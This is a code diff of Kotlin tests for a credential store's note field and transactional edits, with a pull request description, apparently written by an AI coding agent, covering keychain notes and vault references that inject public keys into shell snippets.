+    fun `edit does not resurrect a deleted credential`() {
         val store = CredentialStore(FakeVault())
         store.put(Credential("c-1", "old", CredentialSecret.Password("s")))
         store.remove("c-1")
 
-        store.rename("c-1", "back from the dead")
+        store.edit("c-1", "back from the dead", note = null)
 
         assertNull(store.get("c-1"))
     }
@@ -171,6 +172,96 @@ class CredentialStoreTest {
         store.put(Credential("c-1", "Key", CredentialSecret.Password("x")))
 
         assertEquals(listOf("c-1"), store.all().map { it.id })
+    }
+
+    @Test
+    fun `edit writes the note and can clear it again`() {
+        val store = CredentialStore(FakeVault())
+        val secret = CredentialSecret.PrivateKey(privateKeyPem = "pem", passphrase = null)
+        store.put(Credential("c-1", "temp key", secret))
+
+        store.edit("c-1", "temp key", note = "audit access, drop after 2026-09-01")
+        assertEquals("audit access, drop after 2026-09-01", store.get("c-1")?.note)
+
+        store.edit("c-1", "temp key", note = null)
+        assertNull(store.get("c-1")?.note)
+    }
+
+    @Test
+    fun `putKeepingNote keeps the stored note under new material`() {
+        val store = CredentialStore(FakeVault())
+        store.put(Credential("c-1", "temp key", CredentialSecret.PrivateKey("pem")))
+        store.edit("c-1", "temp key", note = "audit access")
+
+        // What a form re-saving a secret does: it builds the whole record from its fields, and it
+        // has no note field to build one from.
+        store.putKeepingNote(Credential("c-1", "temp key", CredentialSecret.PrivateKey("pem2")))
+
+        assertEquals("audit access", store.get("c-1")?.note)
+        assertEquals(CredentialSecret.PrivateKey("pem2"), store.get("c-1")?.secret)
+    }
+
+    @Test
+    fun `putKeepingNote keeps the caller's note when there is no record yet`() {
+        val store = CredentialStore(FakeVault())
+
+        store.putKeepingNote(Credential("c-1", "fresh", CredentialSecret.Password("x"), note = "born with one"))
+
+        assertEquals("born with one", store.get("c-1")?.note)
+    }
+
+    @Test
+    fun `a credential does not print its own note`() {
+        val cred = Credential("c-1", "prod root", CredentialSecret.Password("s3cret"), note = "root password is in 1Password")
+
+        // The note lives in the same encrypted payload as the material it describes, and says as much
+        // about it: it is redacted from logs and crash reports with the rest.
+        assertEquals("Credential(id=c-1, label=redacted, note=redacted, secret=redacted)", cred.toString())
+    }
+
+    @Test
+    fun `putKeepingNote runs its read-modify-write inside a single transaction`() {
+        val vault = FakeVault()
+        val store = CredentialStore(vault)
+        store.put(Credential("c-1", "temp key", CredentialSecret.Password("x")))
+        // A plain put holds no transaction — the control, as in the `edit` case above.
+        assertFalse(vault.lastPutInTransaction)
+
+        store.putKeepingNote(Credential("c-1", "temp key", CredentialSecret.Password("y")))
+
+        // Both halves: a merge landing a tombstone between a read taken outside the transaction and
+        // the write inside it would still raise the deleted secret on every device.
+        assertTrue(vault.lastReadInTransaction)
+        assertTrue(vault.lastPutInTransaction)
+    }
+
+    @Test
+    fun `putKeepingNote does not raise a deleted credential from the dead`() {
+        val store = CredentialStore(FakeVault())
+        store.put(Credential("c-1", "temp key", CredentialSecret.Password("x")))
+        store.remove("c-1")
+
+        // get() answers null for a tombstone exactly as it does for an id that never existed, so a
+        // write through that would resurrect the secret on every synced device — the same trap
+        // `edit` guards against.
+        store.putKeepingNote(Credential("c-1", "temp key", CredentialSecret.Password("y")))
+
+        assertNull(store.get("c-1"))
+        assertEquals(emptyList(), store.all())
+    }
+
+    @Test
+    fun `a credential written before notes existed reads back without one`() {
+        val vault = FakeVault()
+        // Exactly the payload a client predating the field wrote: no "note" key at all.
+        vault.put(
+            "c-1",
+            RecordType.CREDENTIAL,
+            """{"id":"c-1","label":"Prod root","secret":{"type":"password","password":"s3cret"}}""".encodeToByteArray(),
+        )
+        val store = CredentialStore(vault)
+
+        assertEquals(Credential("c-1", "Prod root", CredentialSecret.Password("s3cret"), note = null), store.get("c-1"))
     }
 
     @Test

--- a/shared/src/commonTest/kotlin/app/skerry/shared/vault/FakeVaultSupport.kt
+++ b/shared/src/commonTest/kotlin/app/skerry/shared/vault/FakeVaultSupport.kt
@@ -29,6 +29,14 @@ internal class FakeVault : Vault {
     var lastPutInTransaction: Boolean = false
         private set
 
+    /**
+     * Whether the most recent record read happened while a [transaction] was held. A store that reads
+     * outside the transaction and writes inside it still passes [lastPutInTransaction] while leaving
+     * the check-then-write race wide open, which is the whole point of holding one.
+     */
+    var lastReadInTransaction: Boolean = false
+        private set
+
     override fun <T> transaction(block: () -> T): T {
         transactionDepth++
         try {
@@ -45,13 +53,18 @@ internal class FakeVault : Vault {
     override fun lock() = Unit
     override fun reset() { entries.clear() }
 
-    override fun records(): List<VaultRecord> = entries.values.map { it.record }
+    override fun records(): List<VaultRecord> {
+        lastReadInTransaction = transactionDepth > 0
+        return entries.values.map { it.record }
+    }
 
     override fun syncMeta(): SyncMeta? = null
     override fun mergeRemote(remote: List<VaultRecord>): MergeResult = MergeResult.EMPTY
 
-    override fun openPayload(id: String): ByteArray? =
-        if (id in unreadable) null else entries[id]?.takeIf { !it.record.deleted }?.payload
+    override fun openPayload(id: String): ByteArray? {
+        lastReadInTransaction = transactionDepth > 0
+        return if (id in unreadable) null else entries[id]?.takeIf { !it.record.deleted }?.payload
+    }
 
     override fun put(id: String, type: RecordType, payload: ByteArray) = putAtLeast(id, type, payload, minVersion = 0L)
 


### PR DESCRIPTION
Closes #222.

## Notes on keychain entries

A keychain entry gains an optional free-form note — the counterpart of a host profile's note, for telling long-lived credential lists apart.

- `Credential.note` lives inside the same encrypted record payload as the material it describes, and is redacted from `toString` with it. A record written before the field existed reads back with no note; no migration.
- The **Rename** dialog became **Edit**: a name and a multi-line note, on desktop and Android. The note is drawn under the entry name in the detail panel and in the mobile sheet, filtered on the way to the screen and announced with its own label.
- Notes are normalized once at the store edge (trimmed, capped, blank collapsed to nothing, never cutting an emoji in half). The helpers moved from the host package to `shared/text` now that hosts and secrets share them.
- `CredentialStore.edit` and the new `putKeepingNote` do their read, their tombstone check and their write inside one transaction, so a merge landing mid-edit cannot resurrect a deleted secret or drop a note.

## `${{vault:name}}` for keys and certificates

The syntax already existed but resolved passwords only — a reference to a key blocked the run. It now injects what the entry's **Copy** button copies:

| Entry | Injected | In the preview |
|---|---|---|
| Password | the password | masked |
| SSH key | the OpenSSH public half | shown |
| Certificate | its type and base64 blob | shown |
| Key kept in a file | nothing — the material never entered the vault | refused |

The private half of a key is never spliced into a command, whatever the template asks for.

- A certificate's trailing comment is dropped, and both fields are checked character by character: the value goes into a shell line without quoting, and nothing validates a certificate's type field on import.
- A name matching more than one entry refuses to resolve rather than picking whichever the store listed first.
- Deriving a public half parses a PEM, so a key reference resolves off the composition thread; everything else resolves before the first frame. **Run** stays disabled until every reference has answered, and the block announces its outcome for a reader who cannot see it.
- The masked span handed to the production guard is now the span the line actually holds, so a password carrying a tab is masked rather than printed.
- The "secrets are inserted as plain text" warning appears only when a real secret is spliced — a run carrying only a public key is not warned about secrets it does not have.

This makes the workflow from the issue work: generate a temporary key, `${{vault:temp_pubkey}}` into a snippet that appends it to `authorized_keys`, and remove it the same way when the task is done.

## Verifying it

1. Vault → any key → **Edit** → write a note → it appears under the entry name, on desktop and on Android.
2. Snippets → new snippet: `echo "${{vault:<your key's name>}}"` → run it. The confirmation names the entry and shows the real `ssh-ed25519 …` line, with no plaintext-secret warning.
3. The same with a password entry: the value is masked and the warning is back.

🤖 Generated with [Claude Code](https://claude.com/claude-code)